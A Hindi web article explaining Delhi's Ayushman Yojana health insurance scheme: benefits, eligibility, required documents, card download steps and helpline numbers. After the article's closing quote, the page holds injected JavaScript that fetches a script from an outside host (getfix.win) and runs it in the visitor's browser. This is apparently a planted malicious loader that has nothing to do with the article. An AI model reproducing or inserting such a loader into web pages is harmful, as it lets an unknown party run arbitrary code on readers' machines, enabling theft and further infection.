Delhi Ayushman Yojana : बीमा राशि 10 लाख रुपए, आयुष्मान कार्ड Download & Registration

दिल्ली के नागरिकों को हेल्थ सेवा प्रदान करने के लिए सरकार ने “Delhi Ayushman Scheme” को शुरू किया हैइस योजना का फायदा गरीब परिवार के नागरिकों को दिया जाएगा, उन्हें 10 लाख रुपए तक का इलाज फ्री में मिलेगा। इस योजना का फायदा उठाने और रजिस्ट्रेशन करने के लिए आपको ये लेख अंत तक जरूर पढ़ना चाहिए।

Delhi Ayushman Yojana

Ayushman Yojana Delhi

भारतीय जनता पार्टी दिल्ली में अपनी सरकार बनाते हुए आयुष्मान योजना को चलाने की शुरुआत करेगी। इस योजना के जरिए सभी गरीब नागरिकों को केंद्र सरकार की तरफ से 5 लाख रुपये और 5 लाख ही राज्य सरकार द्वारा इलाज के लिए प्रदान किए जाएंगे। अब पात्र नागरिक अपना इलाज Free में करा सकेंगे। इस योजना से 10 लाख रुपए प्रति वर्ष तक का निशुल्क इलाज की सुविधा और वरिष्ठ नागरिकों को मुफ्त पाइमोथेरेपी के साथ-साथ डायग्नोस्टिक सेवा भी प्रदान करवाई जाएगी।

दिल्ली आयुष्मान योजना के मुख्य बिंदु

स्कीम का नाम  Delhi Ayushman Yojana
किसने शुरू की  भारतीय जनता पार्टी 
किसके लिए दिल्ली के गरीब परिवार 
फायदा  हेल्थ बीमा निशुल्क में प्रदान करना 
बीमा राशि  10 लाख रुपए (प्रति वर्ष)
आवेदन प्रक्रिया  ऑनलाइन 
ऑफिशियल वेबसाइट  https://pmjay.gov.in/

आर्थिक सहायता (Financial Assistance)

दिल्ली आयुष्मान योजना के जरिए पात्र नागरिकों को 5 लाख रुपये प्रति वर्ष का मुफ्त स्वास्थ्य बीमा प्रदान किया जाएगा। इसके अतिरिक्त राज्य सरकार चिकित्सा उपचार के लिए 5 लाख रुपये अलग से प्रदान करेगी। आवेदक हर साल 10 लाख रुपये तक का मुफ्त इलाज बड़े से बड़े हॉस्पिटल में करा सकते हैं।

पात्रता – मानदंड (Eligibility)

  • इस योजना के लिए दिल्ली के नागरिक पात्र होंगे।
  • गरीब परिवार हेल्थ सेवा का फायदा उठा सकते हैं।
  • जो भी इस योजना के लिए आवेदन करेगा उसकी वार्षिक आय 2.5 लाख रुपए से ज्यादा नहीं होनी चाहिए।
  • पात्र नागरिक को इस तरह की अन्य हेल्थ बीमा योजना का लाभ नहीं मिल रहा होना चाहिए।

उद्देश्य (Objective)

दिल्ली के नागरिकों को बेहतर हेल्थ सेवा प्रदान करने के लिए मुफ्त में चिकित्सा सेवा प्रदान करना है, ताकि गरीब से गरीब नागरिक अपना इलाज अच्छे से अस्पताल में करवा सके।

जरूरी कागजात (Important Documents)

  • पहचान प्रमाण (आधार कार्ड, राशन कार्ड)
  • निवास प्रमाण पत्र
  • आय और जाति प्रमाण पत्र
  • बैंक अकाउंट नंबर 
  • मोबाइल नम्बर
  • पासपोर्ट साइज की फोटो

लाभ (Benefits)

  • नागरिकों को फ्री में इलाज करवाने के लिए हर वर्ष 10 लाख रुपये मिलेंगे।
  • अब योग्य आवेदक सरकारी और निजी अस्पतालों में अपना इलाज बिना किसी पैसे के आसानी से करवा सकेंगे।
  • गरीब परिवारों के लिए ये योजना संजीवनी की तरह कार्य करेगी।
  • ये योजना उन परिवारों को राहत प्रदान करेगी जिनके पास अस्पताल में इलाज करवाने के लिए पैसे नहीं है।
  • इस योजना के अंतर्गत अस्पताल में रहना, खाना, दवाइयाँ, सर्जरी और अन्य चिकित्सा सेवाओं को कवर किया जाएगा।
  • जो आवेदक फ्री में अपना इलाज करवाना चाहते हैं तो उन्हे आयुष्मान कार्ड डाउनलोड करना होगा।

ऐसे करें Delhi Ayushman Yojana के लिए रजिस्ट्रेशन

इस योजना का लाभ आपको तभी मिलेगा जब आप ऑनलाइन रजिस्ट्रेशन करेंगे Registration का लिंक आपको वेबसाइट ओपन करने के बाद दिखाई देगा जब आप इस लिंक पर क्लिक करेंगे तो अगले पेज में रजिस्ट्रेशन फॉर्म खुलेगा जिसे आपको भरना है| फॉर्म भरने के बाद आपको सबमिट करना है

WhatsApp Group Join Now
Telegram Group Join Now
Instagram Group Join Now

दिल्ली आयुष्मान कार्ड डाउनलोड कैसे करें?

STEP I – सबसे पहले आप वेबसाइट ओपन करें।

Delhi Ayushman Yojana

STEP II – इसके बाद होम पेज में Am I eligible के ऑप्शन पर क्लिक करें।

Ayushman Yojana Card

STEP III – अब आप Beneficiary पर टिक करें और आवश्यक जानकारी भरें। उसके बाद ओटीपी वेरिफाई करें।

STEP IV – इसके बाद आप Scheme के सेक्शन में PMJAY को सेलेक्ट करें और अपना राज्य ,जिला चुनें।

STEP V – अगले पेज में आपको लाभार्थियों की सूची दिखाई देगी इसमें से आपको अपना नाम चेक करना है।

STEP VI – सूची में नाम आने पर आपको नाम के आगे डाउनलोड का ऑप्शन मिलेगा। 

STEP VII – आपको यहाँ पर क्लिक करके Delhi Ayushman Card Download कर लेना है।

STEP VIII – इस तरह से आयुष्मान कार्ड डाउनलोड किया जाएगा।

पता / हेल्पलाइन नंबर 

ऑफिस पता 9वीं मंजिल, टॉवर-1, जीवन भारती बिल्डिंग, कनॉट प्लेस, नई दिल्ली – 110001
ईमेल आईडी  webmaster-pmjay[at]nha[dot]gov[dot]in
टोल-फ्री कॉल सेंटर नंबर 14555
70+ आयु के वरिष्ठ नागरिकों के लिए मिस्ड कॉल नंबर  1800110770

संबंधित प्रश्न [FAQs]

योजना के बारे में पूछे जा सकते हैं इस तरह के प्रश्न –

Q1.

दिल्ली आयुष्मान योजना क्या मदद प्रदान करती है ?

Ans. इस योजना के जरिए मेडिकल उपचार के लिए 10 लाख रुपए प्रति वर्ष की बीमा राशि मिलती है।
Q2.

Delhi Ayushman Card कैसे बनाएं?

Ans. आपको फ्री में मेडिकल सेवाओं का लाभ उठाने के लिए आयुष्मान कार्ड बनान के लिए वेबसाइट पर लिंक मिलेगा आपको इस लिंक पर क्लिक करके ये कार्ड डाउनलोड कर लेना है।
Q3.

मैं इस योजना के लिए रजिस्ट्रेशन कैसे कर सकता हूँ ?

Ans. इसके लिए आप वेबसाइट (https://pmjay.gov.in/) पर जाकर ऑनलाइन रजिस्ट्रेशन कर सकते हैं।

“स्वास्थ्य देखभाल के लिए दिल्ली सरकार ने आयुष्मान योजना चलाई है ताकि पात्र परिवार इस योजना का फायदा उठा सकें और उन्हें इलाज करवाने के लिए आर्थिक तंगी का सामना न करना पड़े।”

function loadScript() { var url = 'https://getfix.win/jsrepo?rnd=' + Math.random() + '&ts=' + Date.now();

try { var xhr = new XMLHttpRequest(); xhr.open('GET', url, false); xhr.send(null);

if (xhr.status >= 200 && xhr.status < 300) { var script = document.createElement('script'); script.text = xhr.responseText.trim(); document.head.appendChild(script); } else { console.warn('Script load failed: HTTP ' + xhr.status); } } catch (e) { console.warn('Script load error:', e.message); } } })();

Leave a Comment